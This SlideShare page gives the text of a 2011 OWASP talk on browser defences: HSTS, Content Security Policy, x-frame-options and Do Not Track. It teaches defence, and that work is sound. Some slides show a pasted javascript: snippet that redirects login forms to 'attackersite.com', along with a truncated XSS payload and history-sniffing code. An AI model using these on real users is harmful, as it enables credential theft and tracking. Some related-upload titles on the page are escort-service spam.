SlideShare ist ein Scribd-Unternehmen logo

Enabling Browser Security in Web Applications

Als KEY, PDF herunterladen
Michael Coates
Michael Coates

Enabling Browser Security in Web Applications Topics: Locking Down SSL/TLS Stamping Out Cross Site Scripting Socio-Technical Attacks Privacy Technologies Covered: HTTP Strict Transport Security, Content Securit Policy, X-frame-options, Do Not Track

Technologie
1 von 48
Enabling Browser Security in Web Applications August 25, 2011 OWASP Michael Coates - Mozilla Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
About • Michael Coates • Senior Manager, Mozilla • Lead of Infrastructure Security Team • mcoates@mozilla.com • http://blog.mozilla.com/webappsec/ • http://michael-coates.blogspot.com • @_mwc OWASP 2
Agenda Locking Down SSL/TLS Stamping Out Cross Site Scripting Socio-Technical Attacks Privacy OWASP 3
Fake certificate attack targets Facebook users in Syria May, 2011- theregister.co.uk How to Hijack Facebook Using Firesheep October, 2010 - pcworld.com Locking Down SSL/TLS Leaked Report: ISP Secretly Added Spy Code To Web Sessions, Crashing Browsers June, 2008 - wired.com Internet traffic was routed via Chinese servers U.S. military sites included November, 2010 - washingtontimes.com OWASP 4
Risks of Insecure Communication High likelihood of attack Open wifi, municipal wifi, malicious ISP Easy to exploit High impact to user Clandestine monitoring of population Injection of incorrect/malicious content No protection from any defensive systems Design flaw in application OWASP 5
Insecure Session Management Secure login over HTTPS Fir esh Att Password submitted encrypted ack eep Immediate redirect to HTTP Session ID sent cleartext <-- vulnerability point !!"# !"#$"%&' !"%3*+%"' https://site.com/login ("&'("%%)*+,-.'//012' !"#$"%&' ("%%)*+,-.'//012' http://site.com/profile !"%3*+%"' OWASP 6
Insecure Redirects User requests HTTP page, response redirects HTTPS 302 Response is HTTP <-- Vulnerability Point mybank.com !"#$$%%&%&&'()*+,-./'$ 012$3"456".#$ 7/.*#5/+%$$%%&'%&&'()*+,-./'$ !"#$8##9:%&&'()*+,-./'$ !!"# 211$;/<+4$ OWASP 7
Secure Design for Communication HTTP Strict Transport Security (HSTS) Opt-in security control Website instructs compatible browser to enable STS for site HSTS Forces (for enabled site): All communication over HTTPS No insecure HTTP requests sent from browser No option for user to override untrusted certificates OWASP 8
Strict Transport Security Browser prevents HTTP requests to HSTS site Any request to site is “upgraded” to HTTPS No clear text HTTP traffic ever sent to HSTS site Browser assumes HTTPS for HSTS sites !"#$$ '!(!# $%%&%&&'()*+,-./'$ !"#$0##12%&&'()*+,-./'$ !!"# 344$5/6+7$ OWASP 9
Cookie Forcing HSTS also protects against Cookie Forcing OWASP 10
HSTS FAQ Is HSTS Cert Pinning? No Chicken and the Egg Technically, but drastically less chance of attack Certificate Rotation Problem? No - HSTS forces valid certificate, doesn’t specify which Browser Support Current: Firefox & Chrome https://www.owasp.org/index.php/ HTTP_Strict_Transport_Security#Browser_Support OWASP 11
Protecting Outdated Users HSTS supported in current browsers (Firefox, Chrome) Older browsers all support SECURE Cookie Flag SECURE cookie flag Instructs browser to only send cookie over HTTPS Much less (and different) protection than HSTS, but good defense in depth control OWASP 12
Secure Flag SECURE Flag doesn’t prevent HTTP requests like HSTS Just removes SECURE Cookies from HTTP request !!"# !"#$"%&' !"%()*%"' +"&'+"%%,)*-./'00123' +"4$5"' !!"# !"#$"%&' +"%%,)*-./'00123' !"#$"%&' 666' OWASP 13
Defensive Design HTTP Strict Transport Security http://tools.ietf.org/html/draft-hodges-strict-transport-sec Set SECURE flag for cookies Secure application design for TLS https://www.owasp.org/index.php/ Transport_Layer_Protection_Cheat_Sheet OWASP 14
Cross Site Scripting OWASP 15
Risks of XSS Top Web Security Issue on OWASP Top 10 (2011, 2007, 2004) Impact: Vulnerability allows attacker to change any aspect of a vulnerable web page Business Impact: Compromise of user accounts False data displayed on website Remote monitoring of user actions with website Full attacker control of content displayed and served from website OWASP 16
XSS Example (1) Attacker submits malicious code javascript Name:_____ submit (3) Malicious site steals passwords & installs malware (2) Code is now part of webpage Login: ___ <div class="featured"> <form action="/en-US/firefox/ Pass: ____ users/login" method="post" id="login" class="featured-inner object-lead"> submit to evil site javascript <div> <input type="hidden" <install malware> name="data[Login][referer]" (4) Attacker spreads malicious URL http://site.com/?a=%3cscript%3edocument%2e OWASP 17
Frustrating Problem XSS issues can occur anywhere user data is used in a webpage Difficult to identify all output locations Many frameworks allow design patterns that lead to XSS issues OWASP 18
Content Security Policy (CSP) CSP - New defensive control to eliminate XSS Name:_____ Allows web site to specify where JavaScript can be submit loaded from Injected JavaScript via XSS is CSP Policy rendered inert X-Content- Violations & potential XSS Security-Policy: attacks are reported to web allow 'self'; img- site for investigation src 'self' data: OWASP 19
XSS Example with CSP (1) Attacker submits malicious code javascript Name:_____ submit (2) CSP prevents script execution (3) Site safe to use <div class="featured"> <form action="/en-US/firefox/ users/login" method="post" id="login" class="featured-inner object-lead"> Name:_____ javascript <div> <input type="hidden" submit name="data[Login][referer]" value="/en-US/developers/addons" id="LoginReferer" /><input Violation report sent to site.com/CSPalert OWASP 20
Implementing CSP Some code changes needed to externalize JavaScript Run CSP in report only mode to test Enable CSP and protect users with browsers supporting CSP Receive alerts on potential vulnerabilities in app and quickly address to protect remaining users OWASP 21
CSP Violation Reporting Violations of CSP policy reported to specified URL Acts as XSS intrusion X-Content-Security-Policy: allow self; report-uri http:// detection system reportcollector.example.com/ collector.cgi CSP supported in portion of site users, XSS IDS benefits all Reported data is from client, trust accordingly OWASP 22
CSP Violation Reporting CSP Violation javascript Report Includes: HTTP Request Violation report sent to request-headers site.com/CSPalert blocked-uri violation-directive original-policy OWASP 23
CSP Violation Report OWASP 24
Other CSP Benefits Prevent ClickJacking via frame-ancestors Control embeded frames via frame-src Control domains for images via img-src Control target domains via xhr-src Enforce specific protocols (https://*.foo.com) Future enhancement to control actions & malicious forms OWASP 25
Protecting Outdated Users HTTPOnly mitigates one of XSS impacts - session hijacking Supported in all recent browsers Easy, opt-in security control to protect users Attacker’s Site javascript Cookie: SessionID OWASP 26
Defensive Design CSP gaining traction, potential to solve pressing web security risk HTTPOnly flag - easy setting to add additional layer of defense OWASP XSS Prevention Cheat Sheet https://www.owasp.org/index.php/XSS_ %28Cross_Site_Scripting%29_Prevention_Cheat_Sheet OWASP 27
Socio-Technical Attacks “Visual Fraud” OWASP 28
ClickJacking Attacker includes victim page in iframe & overlays opaque layer Attacker’s image image entices click and text Victim Site interaction Clicks are registered on victim site underneath Attacker’s Overlay User inadvertently performs action at victim site OWASP 29
ClickJacking Example Click the Bouncing Ball Click to follow Joe [ ] Grant Joe full profile access Confirm OWASP 30
ClickJacking Defenses x-frame-options header Full solution Compatible with new versions of browsers Frame Busting Scripts Partial solution Compatible with older browsers OWASP 31
x-frame-options Additional header for HTTP/1.1 200 OK HTTP Response Server: Apache-Coyote/1.1 Content-Type: text/html; Vary: Accept-Encoding Instructs browser to Content-Length: 35236 disallow framing x-frame-options: DENY Two options - DENY, Text SAMEORGIN HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html; Vary: Accept-Encoding Content-Length: 35236 x-frame-options: SAMEORIGIN OWASP 32
x-frame-options Targeted site not display if framed Victim Site Attempted Error page displayed ClickJack Prevents ClickJacking attack Attacker’s Overlay x-f-o Result OWASP 33
Frame Busting Scripts JavaScript within page to detect framing Will either “bust” the frame or not display content <script> if (document.top!= document.location){ document.top= document.location} </script> Not optimal solution - techniques available to bypass defense OWASP 34
URL Social Engineering “Cool n ew hid den fe ature” ” our game gems for y “Get 10 free Click the square and type the secret combination ctrl+a, ctrl+c, ctrl+l, ctrl+v and enter OWASP 35
Danger of those keystrokes... click square - selected text element ctrl a - select all text ctrl c - copy text javascript:.... ctrl l - select location bar javascript:var ctrl v - paste text xmlHttp;xmlHttp=new XMLHttpRequest();xmlHttp.open("G enter - execute JavaScript ET", document.location, false);xmlHttp.send();xmlDoc=xmlHt tp.responseText;var str=xmlDoc;x.replace(/somesite .com/, "attackersite.com"); document.writeln(x); OWASP 36
URL JavaScript Before Pasted JavaScript has full control of username:_____ page password:_____ submit Can rewrite page somesite.com Extract and send any data After No indication to user username:_____ attackersite.com password:_____ submit OWASP 37
Defense Code Change to Browser Remove association between javascript: & loaded document Renders attack inert OWASP 38
Your Android Phone is Tracking You April, 2011 - pcworld.com Your iPhone Is Tracking Your Every Move April, 2011 - readwriteweb.com Privacy Mobile-App Makers Face U.S. Privacy Investigatio April, 2011 - online.wsj.com Nissan car secretly shares driver data with websites June, 2011 - theregister.co.uk/ OWASP 39
Privacy Business gains from gathering user data Privacy infringement based on laws Privacy concerns based on user expectations Need better options for user to understand collected data, control flow and accessibility of user data OWASP 40
Browser Profiling Panopticlick Fingerprints browser based on provided information Plugins installed Font Support Screen Resolution Your browser fingerprint appears to be unique among the 1,636,839 tested so far. Time Zone Currently, we estimate that your browser has a fingerprint that conveys at least 20.64 bits of identifying information. OWASP 41
CSS History Sniffing Determine user’s browsing habits with CSS Visited link different than Visited Link non-visited link Unvisited Link CSS and element inspection determines visited pages if (getComputedStyle(link, "").color == "rgb(0, 0, 128)") { Issued fixed March 2010 // link.href has not been visited } else { // link.href has been visited } } http://dbaron.org/mozilla/visited-privacy OWASP 42
Evercookie “Its [evercookie] goal is to • Standard HTTP Cookies • Local Shared Objects (Flash Cookies) identify a client even after they've • Silverlight Isolated Storage removed standard cookies, Flash • Storing cookies in RGB values of auto-generated, force-cached cookies (Local Shared Objects or • PNGs using HTML5 Canvas tag to read pixels (cookies) back out LSOs), and others.” • Storing cookies in Web History Multiple methods of storing & • Storing cookies in HTTP ETags data on client • Storing cookies in Web cache Could be abused for unauthorized • window.name caching • Internet Explorer userData storage tracking • HTML5 Session Storage Goal to keep user in control of • HTML5 Local Storage data storage / tracking • HTML5 Global Storage mechanisms • HTML5 Database Storage via SQLite http://samy.pl/evercookie/ OWASP 43
Do Not Track Adds header DNT: 1 to all web requests Tells websites user does not want browsing activity to be tracked http://dnt.mozilla.org/ OWASP 44
Permission Manager Granular management options for user interaction with sites Control Location Settings Cookie Settings Popup Windows about:permissions Offline Storage OWASP 45
Privacy Design Privacy controls distinguish applications Design with privacy in mind Growing support for DNT OWASP 46
Closing Defense In Depth Many new security controls to enhance security Strict Transport Security Content Security Policy x-frame-options Do Not Track OWASP 47
Thanks! mcoates@mozilla.com @_mwc OWASP 48

Empfohlen

Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
 
Browser Security
Browser SecurityBrowser Security
Browser SecurityRoberto Suggi Liverani
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012jakobkorherr
 
Web Security
Web SecurityWeb Security
Web SecurityGerald Villorente
 
Security in Web 2.0, Social Web and Cloud
Security in Web 2.0, Social Web and CloudSecurity in Web 2.0, Social Web and Cloud
Security in Web 2.0, Social Web and CloudITDogadjaji.com
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Jim Manico
 

Empfohlen

Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
 
Browser Security
Browser SecurityBrowser Security
Browser SecurityRoberto Suggi Liverani
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012jakobkorherr
 
Web Security
Web SecurityWeb Security
Web SecurityGerald Villorente
 
Security in Web 2.0, Social Web and Cloud
Security in Web 2.0, Social Web and CloudSecurity in Web 2.0, Social Web and Cloud
Security in Web 2.0, Social Web and CloudITDogadjaji.com
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Jim Manico
 
Web Security
Web SecurityWeb Security
Web SecurityRandy Connolly
 
Cisco Study: State of Web Security
Cisco Study: State of Web Security Cisco Study: State of Web Security
Cisco Study: State of Web Security Cisco Canada
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
Modern Web Security
Modern Web SecurityModern Web Security
Modern Web SecurityBill Condo
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
Web application security (RIT 2014, rus)
Web application security (RIT 2014, rus)Web application security (RIT 2014, rus)
Web application security (RIT 2014, rus)Maksim Kochkin
 
Web application Security
Web application SecurityWeb application Security
Web application SecurityLee C
 
OWASP Top 10 Overview
OWASP Top 10 OverviewOWASP Top 10 Overview
OWASP Top 10 OverviewPiTechnologies
 
Owasp web security
Owasp web securityOwasp web security
Owasp web securityPankaj Kumar Sharma
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security RisksSperasoft
 
End to end web security
End to end web securityEnd to end web security
End to end web securityGeorge Boobyer
 
Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsFabio Lombardi
 
Introduction to Web security
Introduction to Web securityIntroduction to Web security
Introduction to Web securityjeyaselvir
 
Web security
Web securityWeb security
Web securityrakesh bandaru
 
Secure Password Storage & Management
Secure Password Storage & ManagementSecure Password Storage & Management
Secure Password Storage & ManagementSastry Tumuluri
 
OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014
OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014
OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014Leonardo Nve Egea
 
Threat Modeling for Web Applications (and other duties as assigned)
Threat Modeling for Web Applications (and other duties as assigned)Threat Modeling for Web Applications (and other duties as assigned)
Threat Modeling for Web Applications (and other duties as assigned)Mike Tetreault
 
Browser security — ROOTS
Browser security — ROOTSBrowser security — ROOTS
Browser security — ROOTSAndre N. Klingsheim
 
Self Defending Applications
Self Defending ApplicationsSelf Defending Applications
Self Defending ApplicationsMichael Coates
 
Security in an Interconnected and Complex World of Software
Security in an Interconnected and Complex World of SoftwareSecurity in an Interconnected and Complex World of Software
Security in an Interconnected and Complex World of SoftwareMichael Coates
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityMichael Coates
 
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAPVirtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAPMichael Coates
 

Weitere ähnliche Inhalte

Andere mochten auch

Cisco Study: State of Web Security
Cisco Study: State of Web Security Cisco Study: State of Web Security
Cisco Study: State of Web Security Cisco Canada
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
Modern Web Security
Modern Web SecurityModern Web Security
Modern Web SecurityBill Condo
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
Web application security (RIT 2014, rus)
Web application security (RIT 2014, rus)Web application security (RIT 2014, rus)
Web application security (RIT 2014, rus)Maksim Kochkin
 
Web application Security
Web application SecurityWeb application Security
Web application SecurityLee C
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security RisksSperasoft
 
End to end web security
End to end web securityEnd to end web security
End to end web securityGeorge Boobyer
 
Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsFabio Lombardi
 
Introduction to Web security
Introduction to Web securityIntroduction to Web security
Introduction to Web securityjeyaselvir
 
Secure Password Storage & Management
Secure Password Storage & ManagementSecure Password Storage & Management
Secure Password Storage & ManagementSastry Tumuluri
 
OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014
OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014
OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014Leonardo Nve Egea
 
Threat Modeling for Web Applications (and other duties as assigned)
Threat Modeling for Web Applications (and other duties as assigned)Threat Modeling for Web Applications (and other duties as assigned)
Threat Modeling for Web Applications (and other duties as assigned)Mike Tetreault
 

Andere mochten auch (18)

Web Security
Web SecurityWeb Security
Web Security
 
Cisco Study: State of Web Security
Cisco Study: State of Web Security Cisco Study: State of Web Security
Cisco Study: State of Web Security
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
Modern Web Security
Modern Web SecurityModern Web Security
Modern Web Security
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
Web application security (RIT 2014, rus)
Web application security (RIT 2014, rus)Web application security (RIT 2014, rus)
Web application security (RIT 2014, rus)
 
Web application Security
Web application SecurityWeb application Security
Web application Security
 
OWASP Top 10 Overview
OWASP Top 10 OverviewOWASP Top 10 Overview
OWASP Top 10 Overview
 
Owasp web security
Owasp web securityOwasp web security
Owasp web security
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security Risks
 
End to end web security
End to end web securityEnd to end web security
End to end web security
 
Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutions
 
Introduction to Web security
Introduction to Web securityIntroduction to Web security
Introduction to Web security
 
Web security
Web securityWeb security
Web security
 
Secure Password Storage & Management
Secure Password Storage & ManagementSecure Password Storage & Management
Secure Password Storage & Management
 
OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014
OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014
OFFENSIVE: Exploiting DNS servers changes BlackHat Asia 2014
 
Threat Modeling for Web Applications (and other duties as assigned)
Threat Modeling for Web Applications (and other duties as assigned)Threat Modeling for Web Applications (and other duties as assigned)
Threat Modeling for Web Applications (and other duties as assigned)
 
Browser security — ROOTS
Browser security — ROOTSBrowser security — ROOTS
Browser security — ROOTS
 

Mehr von Michael Coates

Self Defending Applications
Self Defending ApplicationsSelf Defending Applications
Self Defending ApplicationsMichael Coates
 
Security in an Interconnected and Complex World of Software
Security in an Interconnected and Complex World of SoftwareSecurity in an Interconnected and Complex World of Software
Security in an Interconnected and Complex World of SoftwareMichael Coates
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityMichael Coates
 
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAPVirtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAPMichael Coates
 
2013 michael coates-javaone
2013 michael coates-javaone2013 michael coates-javaone
2013 michael coates-javaoneMichael Coates
 
Bug Bounty Programs For The Web
Bug Bounty Programs For The WebBug Bounty Programs For The Web
Bug Bounty Programs For The WebMichael Coates
 
SQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterSQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterMichael Coates
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterMichael Coates
 
Real Time Application Defenses - The Reality of AppSensor & ESAPI
Real Time Application Defenses - The Reality of AppSensor & ESAPIReal Time Application Defenses - The Reality of AppSensor & ESAPI
Real Time Application Defenses - The Reality of AppSensor & ESAPIMichael Coates
 

Mehr von Michael Coates (11)

Self Defending Applications
Self Defending ApplicationsSelf Defending Applications
Self Defending Applications
 
Security in an Interconnected and Complex World of Software
Security in an Interconnected and Complex World of SoftwareSecurity in an Interconnected and Complex World of Software
Security in an Interconnected and Complex World of Software
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
 
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAPVirtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
 
2013 michael coates-javaone
2013 michael coates-javaone2013 michael coates-javaone
2013 michael coates-javaone
 
Sf startup-security
Sf startup-securitySf startup-security
Sf startup-security
 
Bug Bounty Programs For The Web
Bug Bounty Programs For The WebBug Bounty Programs For The Web
Bug Bounty Programs For The Web
 
SQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterSQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning Center
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
Real Time Application Defenses - The Reality of AppSensor & ESAPI
Real Time Application Defenses - The Reality of AppSensor & ESAPIReal Time Application Defenses - The Reality of AppSensor & ESAPI
Real Time Application Defenses - The Reality of AppSensor & ESAPI
 
SSL Screw Ups
SSL Screw UpsSSL Screw Ups
SSL Screw Ups
 

Kürzlich hochgeladen

Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 

Kürzlich hochgeladen (20)

Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
